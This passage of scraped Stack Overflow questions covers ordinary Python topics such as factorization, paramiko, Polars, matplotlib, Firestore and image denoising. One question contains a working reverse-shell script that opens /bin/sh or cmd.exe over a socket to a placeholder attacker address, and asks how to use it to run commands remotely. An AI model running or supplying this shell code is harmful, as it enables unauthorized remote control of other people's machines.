In [26]: %timeit FermatFactor(8087 * 8089)
1.38 μs ± 12.9 ns per loop (mean ± std. dev. of 7 runs, 1,000,000 loops each)
In [27]: FermatFactor(8087 * 8089)
Out[27]: [8087, 8089]
</code></pre>
<p>So I want to use this algorithm to generate all prime factors of a any given integer (of course I know this only works with odd integers, but that is not an issue since powers of two can be trivially factored out using bit hacking). The easiest way I can think of is to recursively call <code>Fermat_Factor</code> until <code>n</code> is a prime. I don't know how to check if a number is prime in this algorithm, but I noticed something:</p>
<pre><code>In [3]: Fermat_Factor(3)
Out[3]: (1.0, 3.0)
In [4]: Fermat_Factor(5)
Out[4]: (1.0, 3.0)
In [5]: Fermat_Factor(7)
Out[5]: (1.0, 7.0)
In [6]: Fermat_Factor(11)
Out[6]: (1.0, 11.0)
In [7]: Fermat_Factor(13)
Out[7]: (1.0, 13.0)
In [8]: Fermat_Factor(17)
Out[8]: (3.0, 5.0)
In [9]: Fermat_Factor(19)
Out[9]: (1.0, 19.0)
In [10]: Fermat_Factor(23)
Out[10]: (1.0, 23.0)
In [11]: Fermat_Factor(29)
Out[11]: (3.0, 7.0)
In [12]: Fermat_Factor(31)
Out[12]: (1.0, 31.0)
In [13]: Fermat_Factor(37)
Out[13]: (5.0, 7.0)
In [14]: Fermat_Factor(41)
Out[14]: (1.0, 41.0)
</code></pre>
<p>The first number in the output of this algorithm for many primes is 1, but not all, as such it cannot be used to determine when the recursion should stop. I learned it the hard way.</p>
<p>So I just settled to use membership checking of a pregenerated set of primes instead. Naturally this will cause <code>RecursionError: maximum recursion depth exceeded</code> when the input is a prime larger than the maximum of the set. As I don't have infinite memory, this is to be considered implementation detail.</p>
<p>So I have implemented a working version (for some inputs), but for some valid inputs (products of primes within the limit) somehow the algorithm doesn't give the correct output:</p>
<pre><code>import numpy as np
from itertools import cycle
TRIPLE = ((4, 2), (9, 6), (25, 10))
WHEEL = ( 4, 2, 4, 2, 4, 6, 2, 6 )
def prime_sieve(n):
primes = np.ones(n + 1, dtype=bool)
primes[:2] = False
for square, double in TRIPLE:
primes[square::double] = False
wheel = cycle(WHEEL)
k = 7
while (square := k**2) <= n:
if primes[k]:
primes[square::2*k] = False
k += next(wheel)
return np.flatnonzero(primes)
PRIMES = list(map(int, prime_sieve(1048576)))
PRIME_SET = set(PRIMES)
TEST_LIMIT = PRIMES[-1] ** 2
def FermatFactor(n):
if n > TEST_LIMIT:
raise ValueError('Number too large')
if n in PRIME_SET:
return [n]
a = int(n ** 0.5 + 0.5)
if a ** 2 == n:
return FermatFactor(a) + FermatFactor(a)
b2 = abs(a**2 - n)
while int(b2**0.5) ** 2 != b2:
a += 1
b2 = a**2 - n
return FermatFactor(factor := int(a - b2**0.5)) + FermatFactor(n // factor)
</code></pre>
<p>It works for many inputs:</p>
<pre><code>In [18]: FermatFactor(255)
Out[18]: [3, 5, 17]
In [19]: FermatFactor(511)
Out[19]: [7, 73]
In [20]: FermatFactor(441)
Out[20]: [3, 7, 3, 7]
In [21]: FermatFactor(3*5*823)
Out[21]: [3, 5, 823]
In [22]: FermatFactor(37*333667)
Out[22]: [37, 333667]
In [23]: FermatFactor(13 * 37 * 151 * 727 * 3607)
Out[23]: [13, 37, 727, 151, 3607]
</code></pre>
<p>But not all:</p>
<pre><code>In [25]: FermatFactor(5 * 53 * 163)
Out[25]: [163, 13, 2, 2, 5]
In [26]: FermatFactor(3*5*73*283)
Out[26]: [17, 3, 7, 3, 283]
In [27]: FermatFactor(3 * 11 * 29 * 71 * 137)
Out[27]: [3, 11, 71, 61, 7, 3, 3]
</code></pre>
<p>Why is it this case? How can I fix it?</p>
|
<python><algorithm><prime-factoring>
|
2025-01-18 05:11:57
| 1
| 3,930
|
Ξένη Γήινος
|
79,366,465
| 1,997,852
|
How to connect to old SSH server with paramiko?
|
<p>I have an older SSH server which does not support modern cryptography. Logging in with OpenSSH requires these options:</p>
<pre><code>KexAlgorithms=+diffie-hellman-group1-sha1
HostKeyAlgorithms=+ssh-dss
Ciphers=+aes256-cbc
</code></pre>
<p>I'm trying to connect with python Paramiko using this code:</p>
<pre class="lang-py prettyprint-override"><code>client = paramiko.SSHClient()
client.connect(
hostname,
username=username,
password=password,
look_for_keys=False
)
</code></pre>
<p>And I get this error:</p>
<pre><code> File ".venv/lib/python3.10/site-packages/paramiko/dsskey.py", line 152, in verify_ssh_sig
key = dsa.DSAPublicNumbers(
ValueError: p must be exactly 1024, 2048, 3072, or 4096 bits long
</code></pre>
<p>I think it's trying to use DSA and I need to make it use DSS instead but I'm not sure.</p>
|
<python><ssh><paramiko>
|
2025-01-18 02:08:57
| 0
| 1,217
|
Elliott B
|
79,366,457
| 2,072,516
|
Getting VSCode to extend path to a different directory
|
<p>My project structure is:</p>
<pre><code>.
└── src
├── app
└── scripts
</code></pre>
<p>Previously, <code>app</code> and <code>scripts</code> were at the top level, and <code>app</code> was called <code>src</code>. In scripts, I often refer to the app code, and so have</p>
<pre><code>sys.path.append(str((code_path / "app").resolve()))
</code></pre>
<p>in there, so it access the code. Previously, VSCode was able to make the connection and I could do things like ctrl + click on a module and it would take me to the module in the former src/now app folder. However now, VSCode gives me error squiggles under all the module imports, as it can't find them, relatively speaking. I'd like to tell VSCode to include <code>src/app</code> into it's search path for code.</p>
<p>EDIT: Thanks to a comment by JonSG, I added</p>
<pre><code>"terminal.integrated.env.linux": {
"PYTHONPATH": "${env:PYTHONPATH}:${workspaceFolder}/src/app"
},
</code></pre>
<p>to my settings, but it didn't help.</p>
|
<python><visual-studio-code>
|
2025-01-18 01:59:32
| 1
| 3,210
|
Rohit
|
79,366,429
| 1,574,054
|
Matplotlib legend not respecting content size with lualatex
|
<p>I need to generate my matplotlib plots using <code>lualatex</code> instead of <code>pdflatex</code>. Among other things, I am using <code>fontspec</code> to change the document fonts. Below I am using this as an example and set <code>lmroman10-regular.otf</code> as the font. This creates a few issues. One is that the handles in the legends are not fully centered and are followed by some whitespace before the right border:</p>
<p><a href="https://i.sstatic.net/BiKtskzu.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/BiKtskzu.png" alt="A big red arrow point at whitespace after the label text and before the right border of the legend." /></a></p>
<p>The python code generating the intermediate <code>.pgf</code> file looks like this:</p>
<pre class="lang-py prettyprint-override"><code>import matplotlib
import numpy
from matplotlib import pyplot
x = numpy.linspace(-1, 1)
y = x ** 2
matplotlib.rcParams["figure.figsize"] = (3, 2.5)
matplotlib.rcParams["font.family"] = "serif"
matplotlib.rcParams["font.size"] = 10
matplotlib.rcParams["legend.fontsize"] = 8
matplotlib.rcParams["pgf.texsystem"] = "lualatex"
PREAMBLE = r"""\usepackage{ifluatex}
\ifluatex
\usepackage{fontspec}
\setmainfont{lmroman10-regular.otf}
\fi
"""
matplotlib.rcParams["text.latex.preamble"] = PREAMBLE
matplotlib.rcParams["pgf.preamble"] = PREAMBLE
matplotlib.rcParams["text.usetex"] = True
pyplot.plot(x, y, label="this is the data")
pyplot.legend()
pyplot.xlabel("xlabel")
pyplot.tight_layout()
pyplot.savefig("lualatex_test.pgf")
</code></pre>
<p>The <code>.pgf</code> file is then embedded in a latex document. It seems it is not possible to directly compile to <code>.pdf</code> since then the document font will not be the selected font which can for example be seen by setting the font to someting more different like <code>AntPoltExpd-Italic.otf</code>. Also note note that the <code>\ifluatex</code> statement has to be added around the <code>lualatex</code>-only code since <code>matplotlib</code> uses <code>pdflatex</code> to determine the dimensions of text fragements, as will be seen below.</p>
<p>For the sake of this simple example, the <code>.tex</code> file to render the <code>.pgf</code> may be just:</p>
<pre class="lang-tex prettyprint-override"><code>\documentclass[11pt]{scrbook}
\usepackage{pgf}
\usepackage{fontspec}
\setmainfont{lmroman10-regular.otf}
\newcommand{\mathdefault}[1]{#1}
\begin{document}
\input{lualatex_test.pgf}
\end{document}
</code></pre>
<p>which can be typeset using <code>lualatex <filename></code> and results in the figure shown above (without the red arrow).</p>
<p>I thought I had identified the reason for this but it seems I missed something. As mentioned above, matplotlib computes the dimensions of the text patches by actually placing them in a latex templated and compiling it using <code>pdflatex</code>. This happens in the <a href="https://github.com/matplotlib/matplotlib/blob/3b54c6abab3e88880002c5666d626a294aa7126b/lib/matplotlib/texmanager.py#L56" rel="nofollow noreferrer"><code>matplotlib.texmanager.TexManager</code></a> class in the corresponding <a href="https://github.com/matplotlib/matplotlib/blob/main/lib/matplotlib/texmanager.py" rel="nofollow noreferrer">file on the main branch</a> for example. I thought I could fix it like this:</p>
<pre class="lang-py prettyprint-override"><code>
class TexManager:
...
@classmethod
def get_text_width_height_descent(cls, tex, fontsize, renderer=None):
"""Return width, height and descent of the text."""
if tex.strip() == '':
return 0, 0, 0
dvifile = cls.make_dvi(tex, fontsize)
dpi_fraction = renderer.points_to_pixels(1.) if renderer else 1
with dviread.Dvi(dvifile, 72 * dpi_fraction) as dvi:
page, = dvi
# A total height (including the descent) needs to be returned.
w = page.width
# !!!
if tex == "this is the data":
w /= 1.14
print("fixed width")
# !!!
return w, page.height + page.descent, page.descent
</code></pre>
<p>which, to my understanding, should trick matplotlib into thinking the text is shorter by a factor of 1.14 (just a guess, should be adapted once the solution works). The code definitely gets called, since "fixed width" gets printed. But the gap is not fixed:</p>
<p><a href="https://i.sstatic.net/rU8xQqKk.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/rU8xQqKk.png" alt="Nearly the same as the first figure, without the arrow." /></a></p>
<p>How can I fix this issue? How is matplotlib computing the legend content's width and can I maybe patch this to account for the correct width? Let's assume I know that the width error factor for the font size 8 is approximately 1.14. I can easily determine this for other fonts and font sizes.</p>
|
<python><matplotlib><latex><tex><pgf>
|
2025-01-18 01:22:40
| 1
| 4,589
|
HerpDerpington
|
79,366,388
| 11,062,613
|
How to efficiently upsert (update+insert) large datasets with Polars
|
<p>I am working with large datasets stored in Parquet files and need to perform an upsert (update + insert) operation using Polars. If the files grow to a couple of GBs, I run into memory issues and the update operation fails. My system has 16 GB of RAM.</p>
<p>Here’s a simplified example where I generate a large dataset and a smaller dataset for updating:</p>
<pre><code>import polars as pl
def generate_data(groups, nids, ncols, f=1.0):
symbols = pl.LazyFrame({'group': groups})
ids = pl.LazyFrame({'id': pl.arange(nids, dtype=pl.Int64, eager=True)})
cols_expr = [pl.lit(i*f, dtype=pl.Float64).alias(f'val_{i}') for i in range(1, ncols+1)]
return symbols.join(ids, how='cross').with_columns(cols_expr).collect()
# Generate large dataset
df_old = generate_data(groups=list('ABCDEFGHIJKLMNOPQRSTUVWXYZ'), nids=10**7, ncols=4)
print(f'df_old: {round(df_old.estimated_size()/10**9, 3)} GB')
# df_old: 10.66 GB
# Generate relatively small dataset update
df_new = generate_data(groups=['A', 'D', 'XYZ'], nids=10**4, ncols=4, f=10.)
print(f'df_new: {round(df_new.estimated_size()/10**9, 3)} GB')
# df_new: 0.001 GB
# Update fails probably due to memory issues
df = df_old.update(df_new, on=['group', 'id'], how='full').sort(['group', 'id'])
print(df)
# The kernel died, restarting...
# Polars version 1.17.1
</code></pre>
<p>The above code works with smaller datasets, but when the data size increases (e.g., df_old being 10 GB), I encounter kernel crashes.</p>
<p>What is the most memory-efficient way to perform an upsert on large datasets using Polars?
Are there strategies to avoid memory issues while updating large datasets?</p>
|
<python><parquet><python-polars>
|
2025-01-18 00:25:53
| 1
| 423
|
Olibarer
|
79,366,360
| 1,144,854
|
Type hinting Python inheritance “Base classes of [child] are mutually incompatible”
|
<p>I'm trying to learn how to use base classes and inheritance. I'm getting type-checking errors, but the code is running as expected. Do I have type checker problems, type hinting problems, or meaningful code problems?</p>
<p>Here I try a <a href="https://docs.python.org/3/reference/compound_stmts.html#generic-classes" rel="nofollow noreferrer">generic class</a> that inherits from the abstract base class <a href="https://docs.python.org/3/library/collections.abc.html#collections.abc.Sequence" rel="nofollow noreferrer">Sequence</a> (and <a href="https://docs.python.org/3/library/abc.html#abc.ABC" rel="nofollow noreferrer">ABC</a>—is that necessary?). Then I make child classes where that sequence is specifically a list or a tuple. Pylance/pyright is happy with this and it runs fine:</p>
<pre class="lang-py prettyprint-override"><code>from __future__ import annotations
from abc import ABC
from collections.abc import Iterable, Sequence
class Row[T](Sequence[T], ABC):
def __init__(self, iterable: Iterable[T]):
...
class Row_Mutable[T](list[T], Row[T]):
def __init__(self, iterable):
super().__init__(iterable)
class Row_Immutable[T](tuple[T], Row[T]):
def __init__(self, iterable):
super().__init__(iterable)
row_mut_int: Row_Mutable[int] = Row_Mutable(range(10))
row_mut_str: Row_Mutable[str] = Row_Mutable('abcdefg')
row_imm_int: Row_Immutable[int] = Row_Immutable(range(10))
row_imm_str: Row_Immutable[str] = Row_Immutable('abcdefg')
</code></pre>
<p>Now a 2D version. This is a Sequence of Sequences, so the children are list of lists and tuple of tuples:</p>
<pre class="lang-py prettyprint-override"><code>class Grid[T](Sequence[Sequence[T]], ABC):
def __init__(self, iterable: Iterable[Iterable[T]]):
...
class Grid_Mutable[T](list[list[T]], Grid[T]):
def __init__(self, iter_of_iter):
super().__init__(list(row) for row in iter_of_iter)
class Grid_Immutable[T](tuple[tuple[T]], Grid[T]):
def __init__(self, iter_of_iter):
super().__init__(tuple(row) for row in iter_of_iter)
</code></pre>
<p>Now Pylance/pyright calls out the class definitions:</p>
<pre class="lang-none prettyprint-override"><code>Base classes of Grid_Mutable are mutually incompatible
Base class "Grid[T@Grid_Mutable]" derives from "Sequence[Sequence[T@Grid_Mutable]]" which is incompatible with type "Sequence[list[T@Grid_Mutable]]"
</code></pre>
<p>... and the equivalent for the tuple version.</p>
<p>How is <code>Sequence[Sequence[T]]</code> incompatible with <code>Sequence[list[T]]</code>? How <em>should</em> I code and hint something like this?</p>
<p>Copilot suggested the <code>T = TypeVar('T')</code> form rather than <code>Grid[T]</code>; that slightly changed the errors but didn't resolve them. I'm running Python 3.13 and I'm not concerned about backwards compatibility—more about best practices and Pythonicness.</p>
|
<python><generics><python-typing><pyright>
|
2025-01-17 23:57:00
| 3
| 763
|
Jacktose
|
79,367,703
| 1,701,812
|
Connect to reverse shell
|
<p>I have reverse shell code in python:</p>
<pre class="lang-py prettyprint-override"><code>#!/usr/bin/env python3
import socket, subprocess, os
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("attacker_ip", attacker_port))
if os.name == 'nt':
subprocess.call(["cmd.exe"], stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())
else:
subprocess.call(["/bin/sh", "-i"], stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())
</code></pre>
<p>I put IP address and port into the code.</p>
<p>But how to connect to this reverse shell from attacker machine?</p>
<p>EDIT: in the end I need to be able to run commands remotely.</p>
|
<python><shell><reverse-shell>
|
2025-01-17 22:24:56
| 1
| 752
|
pbies
|
79,366,232
| 19,048,408
|
With `aioftp` in Python, how can I recursively list all files in an FTP folder?
|
<p>With <code>aioftp</code> in Python, I want to recursively list all files in an FTP folder.</p>
<p>What's the best way to do that? How can a recursive function be constructed to do that?</p>
<p>Here is my first attempt, which does not work:</p>
<pre class="lang-py prettyprint-override"><code>import aioftp
import asyncio
async def async_list_all_files(
host: str, username: str, password: str, path: str = "/"
) -> list[str]:
async def list_files_recursive_parallel(client: aioftp.Client, path: str = "") -> list[str]:
task_queue: list[asyncio.Future] = []
file_list: list[str] = []
async for entry in client.list(path):
entry_full_path: str = entry[0].as_posix()
# Entry metadata (type hint added)
entry_metadata: dict[str, str | int] = entry[1]
# Handle files and directories
if entry_metadata["type"] == "file":
file_list.append(entry_full_path)
elif entry_metadata["type"] == "dir":
task_queue.append(
asyncio.ensure_future(list_files_recursive_parallel(client, entry_full_path))
)
else:
raise ValueError(
f"Unknown file type: {entry_metadata['type']} from entry='{entry}'"
)
# Process the task queue
if task_queue:
results = await asyncio.gather(*task_queue, return_exceptions=True)
for result in results:
if isinstance(result, list):
file_list.extend(result)
else:
logger.warning(f"Error during task: {result}")
return file_list
async def main() -> list[str]:
client = aioftp.Client()
await client.connect(host)
await client.login(username, password)
# Fetch all files recursively
return await list_files_recursive_parallel(client, path)
# Run the asynchronous `main` function and return results
return await main()
ftp_file_list = asyncio.run(
async_list_all_files(
host=creds["host"],
username=creds["username"],
password=creds["password"],
)
)
</code></pre>
|
<python><python-3.x><ftp-client><aio>
|
2025-01-17 22:20:19
| 0
| 468
|
HumpbackWhale194
|
79,366,199
| 2,276,583
|
VS Code no longer can find Python path used by pyenv
|
<p>I have been using VS Code for Python development on Windows 10 for years. For some time, I have been using <code>pyenv-win</code> to manage installed Python versions in Windows. Once I've configured the version of Python I want to use, I create a virtual environment by entering the following in a PowerShell terminal:</p>
<pre><code>python -m venv .venv
</code></pre>
<p>I then follow the standard process of activating the virtual environment and installing packages:</p>
<pre><code>(venv) python -m pip install <stuff>
</code></pre>
<p>In VS Code I have the Microsoft Python extension installed and enabled, along with the Microsoft extensions <code>Python Debugger</code> and <code>Pylance</code>. When I launch VS Code, and open a Python file, I'm prompted to select an interpreter. I navigate to the location of the interpreter in my virtual environment. I have the following configured in my <code>launch.json</code> file for the project:</p>
<pre><code>{
// Use IntelliSense to learn about possible attributes.
// Hover to view descriptions of existing attributes.
// For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
"version": "0.2.0",
"configurations": [
{
"name": "Python Debugger: Current File",
"type": "debugpy",
"request": "launch",
"program": "${file}",
"console": "integratedTerminal",
"justMyCode": false
}
]
}
</code></pre>
<p>This overall configuration has worked for a couple of years.</p>
<p>Starting a few months ago, when attempting to debug a Python file in VS Code, I get the following error in the "Call Stack" panel of the "Run and Debug" pane:</p>
<pre><code>[WinError 3] The system cannot find the path specified: 'C:\\Users\\<username>\\AppData\\Roaming\\Python\\Python310\\site-packages'
</code></pre>
<p>I gather that at some point I must've had <code>pyenv-win</code> installing Python interpreters in <code>%AppData%</code> or something, rather than in <code>~\.pyenv\pyenv-win\versions</code>. Or maybe not that, I'm kind of at a loss. For some reason, somewhere along the expansion of all the path aliases, <code>%AppData%\Roaming\</code> is being inserted into the effective interpreter path. This is specified nowhere in my <code>$PATH</code> or <code>$PYTHONPATH</code> or any of the interpreter settings in VS Code (that I've found).</p>
<p>Another quirky thing? I have no issues running the very same Python script in a PowerShell terminal, including the terminal integrated into VS Code. This leads me to believe the issue is some stray setting that is affecting the <code>debugpy</code> extension. However, the command entered into the terminal when starting debugging in VS Code (I just press <code>F5</code>) includes the explicit path to the Python interpreter in my virtual environment. Moreover, manually typing that path in the same terminal window/session just works and throws no errors, just like typing <code>python ...</code> does. Running</p>
<p><code>gcm python | Format-List *</code></p>
<p>in the activated virtual environment returns the correct path to the <code>pyenv-win</code> shims directory.</p>
<p>I don't recall if I installed any updates to the VS Code Python-related extensions, nor what changed on my system a few months ago that precipitated the errors. I have made no gross, global changes to any of my workflow, that I can recall: same computer, same install of Windows 10, same install of <code>pyenv-win</code> (I think). It <em>might</em> be that I used to have system Python installed in <code>%AppData%\Roaming\</code> but removed it, and there's something in the <code>pyenv-win</code> configuration/setup that needs to be updated. However, I've done some <code>ripgrep</code> searches in (at least some of) the relevant directories and not found anything obviously incriminating.</p>
<p>I appreciate any tips or help.</p>
<p>Cheerio!</p>
<p><strong>[EDIT TO ADD]</strong>: I just attempted to execute a script using the "Run Python File" command (under the play arrow) and there were no path errors. Trying to run with the debugger is where the error arises.</p>
|
<python><visual-studio-code><pyenv><pyenv-win>
|
2025-01-17 22:01:16
| 0
| 998
|
Daniel Black
|
79,366,085
| 1,245,659
|
How to specify a schema in a DoCmd.TransferDatabase command
|
<p>I am writing a python script to copy MSaccess tables to Postgres. In this particular case, I'm trying to specify the schema that is being loaded in the Postgres. Most code I found here on SO just loads in generic public. I need to load specific schemas.</p>
<pre><code>a = win32com.client.Dispatch("Access.Application")
a.OpenCurrentDatabase(db_path)
table_list = []
for table_info in cursor.tables(tableType='TABLE'):
table_list.append(table_info.table_name)
print (table_list)
for table in table_list:
logging.info(f"Exporting: {table}")
acExport = 1
acTable = 0
a.DoCmd.TransferDatabase(
acExport,
"ODBC Database",
"ODBC;DSN=PostgreSQL30;"
f"DATABASE={db_name};"
f"UID={pg_user};"
f"PWD={pg_pwd};"
f"Schema=Commercial;",
acTable,
f"{table}",
f"{table.lower()}"
)
logging.info(f"Finished Export of Table: {table}")
logging.info("Creating empty table in EGDB based off of this")
</code></pre>
<p>My issue with this is that while I have tried <code>Schema=Commercial</code> and <code>f"Commercial.{table.lower()}"</code>, the tables always land in the public schema. how do I tell the command to export to the correct schema?</p>
<p>Thanks</p>
|
<python><postgresql><ms-access>
|
2025-01-17 20:59:07
| 1
| 305
|
arcee123
|
79,366,038
| 5,923,374
|
HuggingFace: How to compute NDCG in compute metrics?
|
<p>Huggingface trainer has parameter <code>compute_metrics</code>. This function however receives only <code>predictions</code> and <code>labels</code> as its input:</p>
<pre><code>def compute_metric(pred_label):
pred, label = pred_label
return my_metric(pred, label)
</code></pre>
<p>This is sufficient for computing say <code>Acuraccy</code>, but unsuitable for more complex metrics like <code>NDCG</code>, since NDCG also requires information about <code>group_id</code>.</p>
<p>The typical example is information retrieval, where you benchmark set of queries (group_ids) each with different order of preferred results.</p>
<p>Is there a way to access information about <code>group_ids</code> in <code>compute_metrics</code>?</p>
<p>Furthermore, is there a way to access eval dataset name inside <code>compute_metrics</code>?</p>
|
<python><huggingface-transformers>
|
2025-01-17 20:33:39
| 0
| 1,538
|
Ford O.
|
79,366,003
| 11,295,602
|
Controlling build directories for python wheel building
|
<p>Is there a canonical way to ensure no build files (temporary or otherwise) are written to the project area when I build?</p>
<p>When I do a <code>python -m build --wheel</code> for example, I see a <code>build</code> and <code>dist</code> directory with various build artifacts.</p>
<p>I tackled this issue a while back and it involved writing custom bdist_wheel, egg_info, and build commands in setup.py (and then overriding the initialize_options) but I have tried this method and my redirects are being ignored.</p>
<p>It seems like these days the build system is calling build_meta backend which is building in the project area without checking the options.</p>
<p>I know I can pass <code>--outdir</code> to the build command but my build process requires a directory to be generated on the fly so I can't use this unless I write a build script and bypass setup.py and build entirely.</p>
<p>What is the modern way to handle this?</p>
|
<python><build><setuptools>
|
2025-01-17 20:09:25
| 0
| 303
|
squashed
|
79,365,967
| 2,864,250
|
Altair text on rule mark looks blurry
|
<p>For this <a href="https://altair-viz.github.io/gallery/bar_chart_with_single_threshold.html" rel="nofollow noreferrer">example</a> on the documenation page:</p>
<pre class="lang-py prettyprint-override"><code>import pandas as pd
import altair as alt
source = pd.DataFrame({
"Day": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15],
"Value": [55, 112, 65, 38, 80, 138, 120, 103, 395, 200, 72, 51, 112, 175, 131]
})
threshold = 300
bars = alt.Chart(source).mark_bar(color="steelblue").encode(
x="Day:O",
y="Value:Q",
)
highlight = bars.mark_bar(color="#e45755").encode(
y2=alt.Y2(datum=threshold)
).transform_filter(
alt.datum.Value > threshold
)
rule = alt.Chart().mark_rule().encode(
y=alt.Y(datum=threshold)
)
label = rule.mark_text(
x="width",
dx=-2,
align="right",
baseline="bottom",
text="hazardous"
)
(bars + highlight + rule + label)
</code></pre>
<p>The text "hazardous" on the plot looks blurry. How can I control the font properties for a chart specified in this way?</p>
<p>I have tried adding <code>fontWeight="normal"</code> to the <code>mark_text</code> call but the result was unchanged. I would like the text to appear in the same font/weight as the axis labels.</p>
<p>see simplifed vega <a href="https://vega.github.io/editor/#/url/vega-lite/N4Igxg9gdgZglgcxALlANzgUwO4tJKAFzigFcJSBnAdTgBNCALFAZgAY2AacaYsiygAlMiRoVYcAvpO4AbAIYBPTACcUAbVABbeSoDWeEIUUAHTChArSs8zJCYokOiSSoQiw3XmFSWiW2kZbV0DN2MzC0JMAA9xbnlZRCgLFVE4kAAjeUpMRKhzZEyIQkIIP246aJQAWgAmbijYi0Z5AC9dOgEQbirC7HomEDsHJxdDDzcvHz9kdgDpAF0K73lDKHktApAp+WrMeQAWTAO6AE5TlnlT+RgWTABGeQB2e5gXy7YWAFYWe5YADi+Q24ABJKGBGJgdM0SiZKMgAPQItCYBDyAB0CDgTFIGXRcAgCPBkJ0yNRu0SUWRX3RtTY6Pu6IAVpRoN1tiscoRKJ4VntDsczhcrjc7o8Xm8-vJPj8-oCNKAACJKFD3bgANQSpAKXy+QRAyom9RAmtk2tV91q+sNrA1WoKADY9ZwlSrkAc7WaCgDrW6vp7zch-gEXQa3Q6AwU5b6Jk9I6q6TGUP948h7p8k8hTqmWKdna6JunU3SQwWLamnlbQza08bTYGvvdM39U-dLc2PSb7aqnvmw4X-V2varfpIFtIgA" rel="nofollow noreferrer">spec</a></p>
<p><a href="https://i.sstatic.net/tCGe9kKy.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/tCGe9kKy.png" alt="enter image description here" /></a></p>
|
<python><altair>
|
2025-01-17 19:47:35
| 1
| 2,750
|
dubbbdan
|
79,365,903
| 3,368,667
|
access firestore database other than (default) in python
|
<p>I cannot access a Google Firestore database other than one named "(default)". I looked other other solutions online, and added a key to my credential "databaseId" but that doesn't work. Here is my current script</p>
<pre><code>def firestore_add_doc(data):
print('DEBUG Firestore document creation script triggered')
# Load credentials from dictionary
cred = credentials.Certificate(cred_dict)
# Firestore collection name (must exist)
FIRESTORE_COLLECTION = "firestore_collection_one"
try:
# Check if Firebase is already initialized
if not firebase_admin._apps:
firebase_admin.initialize_app(cred, {
'projectId': 'cheftest-f174c',
'databaseId': 'cheftestfirestore'
})
else:
print("Firebase already initialized.")
# Get Firestore client
db = firestore.client()
# Add document to Firestore
collection_ref = db.collection(FIRESTORE_COLLECTION)
doc_ref = collection_ref.add(data)
print(f"Document added with ID: {doc_ref[1].id}")
except Exception as e:
print(f"Error adding document to Firestore: {e}")
if __name__ == "__main__":
data = {
"key1test": "value1test",
"key2test": "value2test"
}
firestore_add_doc(data)
</code></pre>
<p>It still only puts data in the (default) data base and if that database doesn't exist, throws me an error. I checked through the Google CLI and the other database does exist.</p>
|
<python><firebase><google-cloud-firestore><firebase-admin>
|
2025-01-17 19:21:32
| 1
| 1,077
|
tom
|
79,365,750
| 7,347,925
|
How to optimize the weight for TV filter?
|
<p>I have 2d data which has background noise and assembled high values. I'm trying to apply the TV filter to denoise the data. Is there a suitable method to avoid over-denoising the data?</p>
<p>I have tried to check the MSE value like this:</p>
<pre><code>import numpy as np
from skimage.restoration import denoise_tv_chambolle
import matplotlib.pyplot as plt
from sklearn.metrics import mean_squared_error
from scipy import stats
def create_mask_from_quantiles(image, lower_quantile=0.1, upper_quantile=0.9):
"""
Create a mask based on quantile values to exclude extreme values.
Parameters:
-----------
image : 2D numpy array
Input image
lower_quantile : float
Lower quantile threshold (0-1)
upper_quantile : float
Upper quantile threshold (0-1)
Returns:
--------
mask : 2D boolean array
True for values within quantile range
"""
lower_thresh = np.quantile(image, lower_quantile)
upper_thresh = np.quantile(image, upper_quantile)
return (image >= lower_thresh) & (image <= upper_thresh)
def tune_tv_chambolle(noisy_image, weight_range=None, n_weights=10,
lower_quantile=0.1, upper_quantile=0.9, multiplier=2, plot=True):
"""
Find suitable weight parameter for TV Chambolle denoising with quantile masking.
Parameters:
-----------
noisy_image : 2D numpy array
Input image with noise
weight_range : tuple, optional
Range of weights to test (min, max)
n_weights : int
Number of weights to test
lower_quantile : float
Lower quantile for masking
upper_quantile : float
Upper quantile for masking
multiplier: float
STD*multiplier for weight_max
plot : bool
Whether to plot the results
"""
# Create mask for background noise evaluation
mask = create_mask_from_quantiles(noisy_image, lower_quantile, upper_quantile)
if weight_range is None:
# Estimate initial range based on masked image statistics
masked_image = noisy_image[mask]
noise_std = np.std(masked_image)
weight_range = (noise_std/10, noise_std*multiplier)
print('weight_range: ', weight_range)
weights = np.linspace(weight_range[0], weight_range[1], n_weights)
denoised_images = []
metrics = {
'total_variation': [],
'mse_with_original': [],
'entropy': [],
'masked_mse': []
}
# Calculate baseline metrics
baseline_tv = np.sum(np.abs(np.diff(noisy_image, axis=0))) + \
np.sum(np.abs(np.diff(noisy_image, axis=1)))
# Test different weights
for weight in weights:
denoised = denoise_tv_chambolle(noisy_image, weight=weight,
channel_axis=None)
denoised_images.append(denoised)
# Calculate metrics for masked region
tv = np.sum(np.abs(np.diff(denoised, axis=0))) + \
np.sum(np.abs(np.diff(denoised, axis=1)))
metrics['total_variation'].append(tv)
metrics['mse_with_original'].append(
mean_squared_error(noisy_image, denoised))
metrics['masked_mse'].append(
mean_squared_error(noisy_image[mask], denoised[mask]))
metrics['entropy'].append(stats.entropy(denoised[mask].flatten()))
# Find optimal weight using the elbow method on masked MSE
mse_differences = np.diff(metrics['masked_mse'])
elbow_idx = np.argmax(np.abs(np.diff(mse_differences))) + 1
optimal_weight = weights[elbow_idx]
if plot:
fig, axes = plt.subplots(2, 3, figsize=(18, 12))
# Original image
im0 = axes[0,0].imshow(noisy_image, cmap='viridis')
axes[0,0].set_title('Original Noisy Image')
plt.colorbar(im0, ax=axes[0,0])
# Mask visualization
im1 = axes[0,1].imshow(mask, cmap='gray_r')
axes[0,1].set_title('Quantile Mask')
plt.colorbar(im1, ax=axes[0,1])
# Denoised image
optimal_denoised = denoised_images[elbow_idx]
im2 = axes[0,2].imshow(optimal_denoised, cmap='viridis')
axes[0,2].set_title(f'Denoised (weight={optimal_weight:.4f})')
plt.colorbar(im2, ax=axes[0,2])
# Metrics plots
axes[1,0].plot(weights, metrics['total_variation'], 'b-',
label='Total Variation')
axes[1,0].axvline(x=optimal_weight, color='r', linestyle='--',
label='Optimal Weight')
axes[1,0].set_xlabel('Weight')
axes[1,0].set_ylabel('Total Variation')
axes[1,0].legend()
axes[1,1].plot(weights, metrics['masked_mse'], 'g-',
label='Masked MSE')
axes[1,1].set_xlabel('Weight')
axes[1,1].set_ylabel('MSE (masked region)')
axes[1,1].legend()
